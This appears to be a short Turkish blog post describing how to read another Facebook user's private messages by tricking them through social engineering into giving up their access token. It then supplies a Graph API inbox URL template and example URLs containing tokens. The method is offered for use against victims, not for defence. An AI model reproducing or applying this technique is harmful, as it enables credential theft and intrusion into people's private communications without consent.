Evet arkadaşlar daha önce bununla iligli birkaç şey duydum fakat anlayamayıp işin içini biraz kurcaladım ve sonunda ne olduğunu çözdüm bu açık diğer facebook kullanıcılarının uygulamalarda vs kullandığı token leri sosyal mühendislik vb yöntemle kullanıcıdan alarak mesajlarına ulaşmanızı sağlıyor.
Açığın Anlatımı :
Hedef Kişiye tokenli durum hilesi vs göndererek hedeften token istenmelidir o token i aldıktan sonra
Kod:
graph.facebook.com/me//inbox?access_token=tokenkoduburayayapıştırılacak
Örnek Token Linki :
Kod:
https://www.facebook.com/connect/login_success.html#access_token=CAACIS9ZC8nioBAAmAHqZAUpw3oQa3iweGzFQZACvLkVdV8Q9eVww3rJ4XoLXqeGYjSYrBZB0ijezoFGKv1YnjHchuME7OcYU1tHyiZC2n3m7WDiTYfk1bCes2Ft9K13kyuljQKfsKQr0VQCqFVr8PZAakgqDKpoXıpdfnerjWc9Mr2m7jtogjgkoJNh9zxf4d7HN&expires_in=0
Kod:
https://graph.facebook.com/me/inbox?access_token=CAACIS9ZC8nioBAAmAHqZAUpw3oQa3iweGzFQZACvLkVdV8Q9eVww3rJ4XoLXqeGYjSYrBZB0ijezoFGKv1YnjHchuME7OcYU1tHyiZC2n3m7WDidsfsssrgtrgTYfk1bCes2Ft9K13kyuljQKfsKQr0VQCqFVr8PZAakgqDKpoXWc9Mr2m7koJNh9zxf4d7HN&expires_in=0
Video
0 yorum:
Yorum Gönder